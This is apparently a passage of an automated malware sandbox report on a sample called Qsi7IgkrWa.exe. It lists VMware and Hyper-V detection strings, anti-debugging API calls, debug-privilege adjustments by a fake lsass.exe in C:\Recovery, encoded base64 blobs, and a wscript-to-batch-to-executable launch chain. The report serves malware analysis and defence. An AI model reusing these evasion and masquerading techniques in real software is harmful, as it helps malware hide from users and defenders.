Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: ComponentBrowserruntimeHostNet.exe, 00000004.00000002.1767137120.000000001B710000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_0
Source: lsass.exe, 0000002B.00000002.2555484716.0000000003107000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]l50/P
Source: lsass.exe, 00000025.00000002.2485467644.000000001C400000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHN
Source: lsass.exe, 0000003A.00000002.2900411271.00000000134F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: lsass.exe, 0000002B.00000002.2585233177.000000001BC04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: lsass.exe, 00000011.00000002.2038553810.000000001D0AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: Qsi7IgkrWa.exe, 00000000.00000003.1656492217.0000000000942000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 00000011.00000002.2038553810.000000001D095000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: w32tm.exe, 00000034.00000002.2688362600.000001EED01F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: lsass.exe, 0000003A.00000002.2900411271.00000000136BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: lsass.exe, 0000000A.00000002.1888524179.0000000000889000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:t
Source: Qsi7IgkrWa.exe, ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe1.4.dr, ComponentBrowserruntimeHostNet.exe.0.dr, TextInputHost.exe.4.dr, lsass.exe.4.dr, ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe.4.dr, ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe0.4.dr	Binary or memory string: uW7QEMUZyt
Source: lsass.exe, 0000002B.00000002.2555484716.0000000003122000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: U8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAAv0CXP
Source: lsass.exe, 0000000A.00000002.1898371850.000000001C423000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPB
Source: lsass.exe, 0000003A.00000002.2859804094.00000000036DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA"
Source: lsass.exe, 0000000A.00000002.1900219630.000000001C4FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000001.00000003.1722916927.0000000002702000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\U,"
Source: wscript.exe, 00000001.00000003.1722916927.0000000002702000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.[
Source: lsass.exe, 0000003A.00000002.2859804094.00000000036E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: U8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAAv0CX
Source: lsass.exe, 00000035.00000002.2757995941.000000001C800000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 0000003A.00000002.2904336941.000000001D204000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
Source: lsass.exe, 0000003A.00000002.2859804094.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]l50/
Source: lsass.exe, 00000011.00000002.2037800974.000000001D004000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000015.00000002.2075448280.000001D2D0469000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2124077751.000000001C600000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2270948220.000000001C604000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2399124843.000000001C804000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000024.00000002.2427388528.000002305EE37000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000029.00000002.2511918658.000001E7D6BB8000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002F.00000002.2604354524.000001CF79D37000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2672239273.000000001C600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

API call chain: ExitProcess graph end node

graph_0-23922

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Code function: 0_2_00BCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00BCF838

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Code function: 0_2_00BD7DEE mov eax, dword ptr fs:[00000030h]

0_2_00BD7DEE

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Code function: 0_2_00BDC030 GetProcessHeap,

0_2_00BDC030

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\lsass.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\lsass.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\lsass.exe	Process token adjusted: Debug
Source: C:\Recovery\lsass.exe	Process token adjusted: Debug
Source: C:\Recovery\lsass.exe	Process token adjusted: Debug
Source: C:\Recovery\lsass.exe	Process token adjusted: Debug
Source: C:\Recovery\lsass.exe	Process token adjusted: Debug
Source: C:\Recovery\lsass.exe	Process token adjusted: Debug
Source: C:\Recovery\lsass.exe	Process token adjusted: Debug
Source: C:\Recovery\lsass.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BCF838
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BCF9D5 SetUnhandledExceptionFilter,	0_2_00BCF9D5
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BCFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00BCFBCA
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BD8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BD8EBD

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe "C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe"	Jump to behavior
